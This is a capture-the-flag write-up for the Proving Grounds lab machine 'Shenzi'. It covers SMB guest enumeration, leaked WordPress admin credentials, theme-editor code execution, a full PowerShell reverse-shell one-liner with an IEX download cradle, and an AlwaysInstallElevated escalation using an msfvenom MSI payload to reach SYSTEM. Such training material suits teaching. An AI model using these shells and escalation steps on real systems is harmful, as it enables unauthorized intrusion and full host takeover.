Shenzi
Enumeration:
Port Scanning:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Shenzi]
└─$ sudo nmap -sCV -p- --min-rate 4000 -oA nmap/services -vv 192.168.203.55
Starting Nmap 7.95 ( https://nmap.org ) at 2025-11-14 01:23 EST
Nmap scan report for 192.168.203.55
Host is up, received echo-reply ttl 125 (0.21s latency).
Scanned at 2025-11-14 01:24:00 EST for 202s
Not shown: 65520 closed tcp ports (reset)
PORT STATE SERVICE REASON VERSION
21/tcp open ftp syn-ack ttl 125 FileZilla ftpd 0.9.41 beta
| ftp-syst:
|_ SYST: UNIX emulated by FileZilla
80/tcp open http syn-ack ttl 125 Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)
|_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6
| http-title: Welcome to XAMPP
|_Requested resource was http://192.168.203.55/dashboard/
|_http-favicon: Unknown favicon MD5: 56F7C04657931F2D0B79371B2D6E9820
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
135/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 125 Microsoft Windows netbios-ssn
443/tcp open ssl/http syn-ack ttl 125 Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)
| http-title: Welcome to XAMPP
|_Requested resource was https://192.168.203.55/dashboard/
|_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
| tls-alpn:
|_ http/1.1
|_http-favicon: Unknown favicon MD5: 6EB4A43CB64C97F76562AF703893C8FD
| ssl-cert: Subject: commonName=localhost
| Issuer: commonName=localhost
| Public Key type: rsa
| Public Key bits: 1024
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2009-11-10T23:48:47
| Not valid after: 2019-11-08T23:48:47
| MD5: a0a4:4cc9:9e84:b26f:9e63:9f9e:d229:dee0
| SHA-1: b023:8c54:7a90:5bfa:119c:4e8b:acca:eacf:3649:1ff6
| -----BEGIN CERTIFICATE-----
| MIIBnzCCAQgCCQC1x1LJh4G1AzANBgkqhkiG9w0BAQUFADAUMRIwEAYDVQQDEwls
<snipped>
|_-----END CERTIFICATE-----
|_ssl-date: TLS randomness does not represent time
445/tcp open microsoft-ds? syn-ack ttl 125
3306/tcp open mysql syn-ack ttl 125 MariaDB 10.3.24 or later (unauthorized)
5040/tcp open unknown syn-ack ttl 125
7680/tcp open pando-pub? syn-ack ttl 125
49664/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49665/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49666/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49667/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49668/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49669/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
<snipped>We have multiple open ports, we will play with them one by one.
FTP (21):
I could not authenticate as anonymous user.
SMB (445):
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Shenzi]
└─$ nxc smb 192.168.203.55 -u '' -p ''
SMB 192.168.203.55 445 SHENZI [*] Windows 10 / Server 2019 Build 19041 x64 (name:SHENZI) (domain:shenzi) (signing:False) (SMBv1:False)
SMB 192.168.203.55 445 SHENZI [-] shenzi\: STATUS_ACCESS_DENIEDWe do not have null session authentication, but:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Shenzi]
└─$ nxc smb 192.168.203.55 -u 'guest' -p ''
SMB 192.168.203.55 445 SHENZI [*] Windows 10 / Server 2019 Build 19041 x64 (name:SHENZI) (domain:shenzi) (signing:False) (SMBv1:False)
SMB 192.168.203.55 445 SHENZI [+] shenzi\guest:We do have guest authentication.
Enumerate the shares:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Shenzi]
└─$ nxc smb 192.168.203.55 -u 'guest' -p '' --shares
SMB 192.168.203.55 445 SHENZI [*] Windows 10 / Server 2019 Build 19041 x64 (name:SHENZI) (domain:shenzi) (signing:False) (SMBv1:False)
SMB 192.168.203.55 445 SHENZI [+] shenzi\guest:
SMB 192.168.203.55 445 SHENZI [*] Enumerated shares
SMB 192.168.203.55 445 SHENZI Share Permissions Remark
SMB 192.168.203.55 445 SHENZI ----- ----------- ------
SMB 192.168.203.55 445 SHENZI IPC$ READ Remote IPC
SMB 192.168.203.55 445 SHENZI Shenzi READWe have read access to a non-default share named shenzi.
Via smbclient we can authenticate see what files are there, and download if any.
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Shenzi]
└─$ mkdir smb
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Shenzi]
└─$ cd smb
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Shenzi/smb]
└─$ smbclient //192.168.203.55/Shenzi -U guest
Password for [WORKGROUP\guest]:
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Thu May 28 11:45:09 2020
.. D 0 Thu May 28 11:45:09 2020
passwords.txt A 894 Thu May 28 11:45:09 2020
readme_en.txt A 7367 Thu May 28 11:45:09 2020
sess_klk75u2q4rpgfjs3785h6hpipp A 3879 Thu May 28 11:45:09 2020
why.tmp A 213 Thu May 28 11:45:09 2020
xampp-control.ini A 178 Thu May 28 11:45:09 2020
12941823 blocks of size 4096. 4831147 blocks available
smb: \> prompt off
smb: \> recurse on
smb: \> mget *
getting file \passwords.txt of size 894 as passwords.txt (1.1 KiloBytes/sec) (average 1.1 KiloBytes/sec)
getting file \readme_en.txt of size 7367 as readme_en.txt (7.8 KiloBytes/sec) (average 4.7 KiloBytes/sec)
getting file \sess_klk75u2q4rpgfjs3785h6hpipp of size 3879 as sess_klk75u2q4rpgfjs3785h6hpipp (4.0 KiloBytes/sec) (average 4.4 KiloBytes/sec)
getting file \why.tmp of size 213 as why.tmp (0.3 KiloBytes/sec) (average 3.4 KiloBytes/sec)
getting file \xampp-control.ini of size 178 as xampp-control.ini (0.2 KiloBytes/sec) (average 2.8 KiloBytes/sec)Non of the files were interesting except for that one:
┌──(kali㉿kali)-[~/…/OffsecPG/Practice/Shenzi/smb]
└─$ cat passwords.txt
<snipped>
5) WordPress:
User: admin
Password: FeltHeadwallWight357We have a set of credentials that seems to be for the admin on wordpress.
HTTP (80):
We were welcomed with the xampp default page.
I will run gobuster to discover hidden directories:
┌──(kali㉿kali)-[~/…/OffsecPG/Practice/Shenzi/smb]
└─$ gobuster dir -u http://192.168.203.55/ -w /usr/share/wordlists/dirb/big.txt -x php -t 40
===============================================================
Gobuster v3.8
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.203.55/
[+] Method: GET
[+] Threads: 40
[+] Wordlist: /usr/share/wordlists/dirb/big.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.8
[+] Extensions: php
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.htaccess (Status: 403) [Size: 1046]
/Index.php (Status: 302) [Size: 0] [--> http://192.168.203.55/dashboard/]
/aux (Status: 403) [Size: 1046]
/aux.php (Status: 403) [Size: 1046]
/cgi-bin/ (Status: 403) [Size: 1060]
/com1.php (Status: 403) [Size: 1046]
/com2 (Status: 403) [Size: 1046]
/com2.php (Status: 403) [Size: 1046]
/com1 (Status: 403) [Size: 1046]
/com3.php (Status: 403) [Size: 1046]
/com3 (Status: 403) [Size: 1046]
/com4 (Status: 403) [Size: 1046]
/com4.php (Status: 403) [Size: 1046]
/con (Status: 403) [Size: 1046]
/con.php (Status: 403) [Size: 1046]
/dashboard (Status: 301) [Size: 344] [--> http://192.168.203.55/dashboard/]
/examples (Status: 503) [Size: 1060]
/favicon.ico (Status: 200) [Size: 30894]
/img (Status: 301) [Size: 338] [--> http://192.168.203.55/img/]
/index.php (Status: 302) [Size: 0] [--> http://192.168.203.55/dashboard/]
/licenses (Status: 403) [Size: 1205]
<snipped>
/xampp (Status: 301) [Size: 340] [--> http://192.168.203.55/xampp/]
Progress: 40938 / 40938 (100.00%)
===============================================================
Finished
===============================================================I tried a couple of wordlists with no further results.
Then I went back to offsec portal, and unloacked one of the hints:
It says we should guess the root directory of wordpress website.
Sometimes offsec's uses the machine names in a lot of places like usernames, passwords, or even as a directory:
Here we have the wordpress website.
Go to /wp-admin it will redirect us to the login form:
Enter the username, and password we found earlier: admin:FeltHeadwallWight357.
We logged in successfully.
Exploitation:
From here we can get command execution since we are admins using two ways as I know: 1. uploading a plugin then use it to get command execution, or by adding a simple one line of php code in one of the themes files, then use it to get a reverse shell as well, I will use the latter, by going to Appearance -> Theme Editor -> Choose one of the PHP files (I chosed error.php, because if we triggered any error the code will be executed):
Scroll down, and click update file:
Now if we went to any non-existent page, we would see an error because of the system function:
Add the cmd paramter, and try any system command:
Nice we have command execution.
Now I will prepare a powershell web-cradle:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Shenzi]
└─$ cp /usr/share/nishang/Shells/Invoke-PowerShellTcpOneLine.ps1 shell.ps1
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Shenzi]
└─$ vim shell.p
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Shenzi]
└─$ cat shell.ps1
$client = New-Object System.Net.Sockets.TCPClient('192.168.45.195',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()Set-up a python3 web server, and a netcat listener:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Shenzi]
└─$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Shenzi]
└─$ rlwrap nc -nlvp 443
listening on [any] 443 ...Then download that file on the system memory and execute it via Invoke-Expression:
IEX(IWR -UseBasicParsing -Uri http://192.168.45.195/shell.ps1)
We will get a hit to our webserver:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Shenzi]
└─$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
192.168.203.55 - - [14/Nov/2025 02:01:55] "GET /shell.ps1 HTTP/1.1" 200 -And we have a reverse shell as shenzi:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Shenzi]
└─$ rlwrap nc -nlvp 443
listening on [any] 443 ...
connect to [192.168.45.195] from (UNKNOWN) [192.168.203.55] 50440
PS C:\xampp\htdocs\shenzi> whoami
shenzi\shenziPost-Exploitation:
I will upload winpeas to enumerate the system and try to find any attack vector for privilege escalation:
PS C:\Windows\Tasks> curl http://192.168.45.195/winPEASx86.exe -o winPEASx86.exe
PS C:\Windows\Tasks> dir
Directory: C:\Windows\Tasks
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 11/13/2025 11:09 PM 10171904 winPEASx86.exeRun it:
PS C:\Windows\Tasks> .\winPEASx86.exe
[!] If you want to run the file analysis checks (search sensitive information in files), you need to specify the 'fileanalysis' or 'all' argument. Note that this search mi
ght take several minutes. For help, run winpeass.exe --help
ANSI color bit for Windows is not set. If you are executing this from a Windows terminal inside the host you should run 'REG ADD HKCU\Console /v VirtualTerminalLevel /t REG
_DWORD /d 1' and then start a new CMD
Long paths are disabled, so the maximum length of a path supported is 260 chars (this may cause false negatives when looking for files). If you are admin, you can enable it
with 'REG ADD HKLM\SYSTEM\CurrentControlSet\Control\FileSystem /v VirtualTerminalLevel /t REG_DWORD /d 1' and then start a new CMD
((((((((((((((((((((((((((((((((
(((((((((((((((((((((((((((((((((((((((((((
((((((((((((((**********/##########(((((((((((((
((((((((((((********************/#######(((((((((((
((((((((******************/@@@@@/****######((((((((((
((((((********************@@@@@@@@@@/***,####((((((((((
(((((********************/@@@@@%@@@@/********##(((((((((
(((############*********/%@@@@@@@@@/************((((((((
((##################(/******/@@@@@/***************((((((
((#########################(/**********************(((((
((##############################(/*****************(((((
((###################################(/************(((((
((#######################################(*********(((((
((#######(,.***.,(###################(..***.*******(((((
((#######*(#####((##################((######/(*****(((((
((###################(/***********(##############()(((((
(((#####################/*******(################)((((((
((((############################################)((((((
(((((##########################################)(((((((
((((((########################################)(((((((
((((((((####################################)((((((((
(((((((((#################################)(((((((((
((((((((((##########################)(((((((((
((((((((((((((((((((((((((((((((((((((
((((((((((((((((((((((((((((((
ADVISORY: winpeas should be used for authorized penetration testing and/or educational purposes only. Any misuse of this software will not be the responsibility of the auth
or or of any other collaborator. Use it at your own devices and/or with the device owner's permission.
<snipped>
???????????? Checking AlwaysInstallElevated
? https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#alwaysinstallelevated
AlwaysInstallElevated set to 1 in HKLM!
AlwaysInstallElevated set to 1 in HKCU!We have two important registries their values has been set to 1 which allow us to elevate our privileges.
You can refer to the hacktricks website for more information:
We can confirm the result of winpeas by quering the registries:
PS C:\Windows\Tasks> reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\Installer
AlwaysInstallElevated REG_DWORD 0x1
PS C:\Windows\Tasks> reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer
AlwaysInstallElevated REG_DWORD 0x1Now I will generate a .msi file, then upload it to the target:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Shenzi]
└─$ msfvenom -p windows/shell_reverse_tcp LHOST=192.168.45.195 LPORT=443 -f msi -o runme.msi
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 324 bytes
Final size of msi file: 159744 bytes
Saved as: runme.msiPS C:\Windows\Tasks> curl http://192.168.45.195/runme.msi -o runme.msi
PS C:\Windows\Tasks> dir
Directory: C:\Windows\Tasks
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 11/13/2025 11:40 PM 159744 runme.msi
-a---- 11/13/2025 11:09 PM 10171904 winPEASx86.exeStart another netcat listener:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Shenzi]
└─$ rlwrap nc -nlvp 443
listening on [any] 443 ...Use msiexec to execute our installer, so we can get high privilege access:
PS C:\Windows\Tasks> msiexec /quiet /qn /i C:\Windows\Tasks\runme.msiGoing back to our netcat:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Shenzi]
└─$ rlwrap nc -nlvp 443
listening on [any] 443 ...
connect to [192.168.45.195] from (UNKNOWN) [192.168.203.55] 50920
Microsoft Windows [Version 10.0.19042.1526]
(c) Microsoft Corporation. All rights reserved.
C:\WINDOWS\system32>whoami
nt authority\systemWe are system.
Get the flags:
C:\WINDOWS\system32>type \Users\Administrator\Desktop\proof.txt
f526ab9a5ca67ea41c3dfd4892208d7d
C:\WINDOWS\system32>type \Users\shenzi\Desktop\local.txt
52eea052824fb47ad872425b98225970Last updated